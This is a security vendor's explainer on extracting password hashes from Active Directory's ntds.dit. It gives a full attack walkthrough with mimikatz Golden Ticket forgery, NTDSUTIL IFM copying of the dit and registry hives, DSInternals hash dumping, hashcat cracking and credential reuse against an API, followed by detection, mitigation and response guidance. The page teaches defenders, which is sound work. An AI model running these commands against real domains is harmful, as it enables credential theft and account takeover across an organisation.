
NTDS.dit Password Extraction Attack

All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes taken directly from the dit to advance their objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, because users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must already have gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack), so even older backups can be useful.

Threat Summary

Target: Active Directory

Tools: DSInternals, ntdsxtract, PowerSploit, mimikatz

ATT&CK® Tactic: Credential Access

ATT&CK Technique: T1003.003

Difficulty

Detection: Medium

Mitigation: Medium

Response: Hard

Attack Tutorial: How NTDS.dit Password Extraction Works

STEP 1: Obtain required privileges

An adversary must have access to a domain controller’s file system before they can extract ntds.dit. Because this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket.
In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.

    PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
    User: FakeUser1
    Domain: domain.com (DOMAIN)
    SID: S-1-5-21-441320023-234525631-506766575
    User Id: 0
    Groups Id : *513 512 520 518 519
    ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
    Service: HOST
    Target: DC1.domain.com
    Lifetime: 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
    -> Ticket : ** Pass The Ticket **
    * PAC generated
    * PAC signed
    * EncTicketPart generated
    * EncTicketPart encrypted
    * KrbCred generated
    Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session

    mimikatz # misc::cmd
    Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320

    # A new command prompt window opens
    C:\Windows\System32>

STEP 2: Exfiltrate ntds.dit

With access to a domain controller’s file system, the adversary can exfiltrate ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit.

Note that while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:

  • Simply stop Active Directory (though this is likely to result in being detected).
  • Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.
  • Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.
  • Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create Active Directory Install From Media (IFM) files, as in the example below.

    PS> .\PSExec.exe \\dc1.domain.com cmd

    PsExec v2.2 - Execute processes remotely
    Copyright (C) 2001-2016 Mark Russinovich
    Sysinternals - www.sysinternals.com

    Microsoft Windows [Version 10.0.17763.1339]
    (c) 2018 Microsoft Corporation. All rights reserved.

    DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
    NTDSUTIL: Activate Instance NTDS
    Active instance set to "NTDS".
    NTDSUTIL: IFM
    ifm: Create Full S:\Files
    Creating snapshot...
    Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
    Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
    Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
    Initiating DEFRAGMENTATION mode...
    Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
    Target Database: S:\Files\Active Directory\ntds.dit

    DefragmentationStatus (Complete)
    0    10   20   30   40   50   60   70   80   90  100
    |----|----|----|----|----|----|----|----|----|----|
    ...................................................

    Copying registry files...
    Copying S:\Files\registry\SYSTEM
    Copying S:\Files\registry\SECURITY
    Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
    Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
    IFM media created successfully in S:\Files
    ifm: q
    NTDSUTIL: q

    DC1 > Copy S:\Files \\wks2\Share

STEP 3: Extract the password hashes

Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack on a computer optimized for that purpose, but first they need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose: Get-BootKey derives the Boot Key from the exfiltrated SYSTEM hive, and Get-ADDBAccount uses that key to decrypt the account secrets stored in the dit.

    PS> $Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
    PS> Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
        Format-Custom -View HashcatNT |
        Out-File C:\Hashdump.txt

    PS> Get-Content C:\Hashdump.txt
    f8ae01fc52f45dda7baf7a67721665f1
    eed224b4784bb040aab50b8856fe9f02
    # --- Output Truncated --- #

STEP 4: Use the password hashes to gain further objectives

The adversary can now use the password hashes in pass-the-hash attacks within the environment (perhaps as a means of persistence). More likely, they will seek to crack these passwords for use in credential stuffing attacks against non-domain-joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.

    PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1

    Session..........: hashcat
    Status...........: Running
    Hash.Name........: NTLM
    Hash.Target......: .\Hashdump.txt
    Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
    Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
    Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
    Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
    Recovered........: 1/41 (2.44%) Digests
    Progress.........: 189030831226880/218340105584896 (86.58%)
    Rejected.........: 0/189030831226880 (0.00%)
    Restore.Point....: 793149440/916132832 (86.58%)
    Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
    Candidates.#1....: TNAZRwMl -> FYNkI2Jx
    Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16

    PS> Get-Content .\cracked.txt
    852e811a65d732c83214b4ff705d777a:F8qN47F1

    PS> # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
    PS> $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
    PS> $Password = "F8qN47F1" # This is the password copied from cracked.txt
    PS> $Object = New-Object -TypeName psobject
    PS> $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
    PS> $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
    PS> $url = "https://service.url/api/login"
    PS> $body = $Object | ConvertTo-Json
    PS> $Header = @{ "accept" = "text/json"}
    PS> $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
    PS> $Headers = @{ 'Authorization' = "Bearer $Response" }
    PS> $url = "https://service.url/api/DoThings"
    PS> $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
    PS> $Response
    { "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate and Respond

Detect

Difficulty: Medium

Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4656 (a handle to an object was requested) and 4663 (an attempt was made to access an object) in the Audit File System subcategory record file system access, provided the subcategory is enabled and the file carries a system access control list (SACL) for the operations of interest. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
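One way to put the audit events above to work on a domain controller, added here as an example (not code from the Netwrix page): it adds a SACL to the dit so reads generate 4656/4663, then pulls matching events, flagging any whose object path points into a shadow copy. It assumes the default dit path, that the Audit File System subcategory is already enabled, and a 24-hour look-back window; the variable names are the example's own.

```powershell
# Added example: audit access to ntds.dit and hunt the Security log for it.
# Assumes the default dit location and that "Audit File System" auditing is on, e.g.
#   auditpol /set /subcategory:"File System" /success:enable /failure:enable
# Run as an administrator on the domain controller.

$DitPath = 'C:\Windows\NTDS\ntds.dit'   # adjust if the database was relocated

# 1. Add an audit rule so any read, write or delete of the file by anyone produces
#    4656/4663. The SACL is part of the file's security descriptor, so it is carried
#    into VSS snapshots and reads via \Device\HarddiskVolumeShadowCopyN are audited too.
#    Writing the DACL/SACL needs WRITE_DAC/ACCESS_SYSTEM_SECURITY, which is not blocked
#    by the exclusive data lock LSASS holds on the live dit.
$Acl  = Get-Acl -Path $DitPath -Audit
$Rule = New-Object System.Security.AccessControl.FileSystemAuditRule `
    -ArgumentList 'Everyone', 'ReadData, WriteData, Delete', 'Success, Failure'
$Acl.AddAuditRule($Rule)
Set-Acl -Path $DitPath -AclObject $Acl

# 2. Collect recent 4656/4663 events and keep those whose ObjectName ends in ntds.dit.
#    Matching on the file name rather than the full path catches both the live file and
#    copies read out of a mounted snapshot.
$Events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4656, 4663
    StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue

$Hits = foreach ($e in $Events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($d['ObjectName'] -match '\\ntds\.dit$') {
        [pscustomobject]@{
            Time         = $e.TimeCreated
            EventId      = $e.Id
            Subject      = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Process      = $d['ProcessName']
            ObjectName   = $d['ObjectName']
            FromSnapshot = ($d['ObjectName'] -like '*HarddiskVolumeShadowCopy*')
        }
    }
}

# Expect baseline noise from lsass.exe at service start and from the backup agent's
# VSS-based jobs; anything else (cmd.exe, powershell.exe, ntdsutil.exe, an unknown
# account) touching the dit is worth an alert.
$Hits | Sort-Object Time | Format-Table -AutoSize
```

Pair the file audit with the mitigation below: the SACL only shows that the dit was read, it does not stop an adversary who already holds domain controller administrator rights.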

Mitigate

Difficulty: Medium

To mitigate the risk of password extraction from ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:

  • Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
  • Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
  • Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
  • Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.

Respond

Difficulty: Hard

If compromise of ntds.dit is suspected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt secret was also compromised. Take the following action:

  • Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.
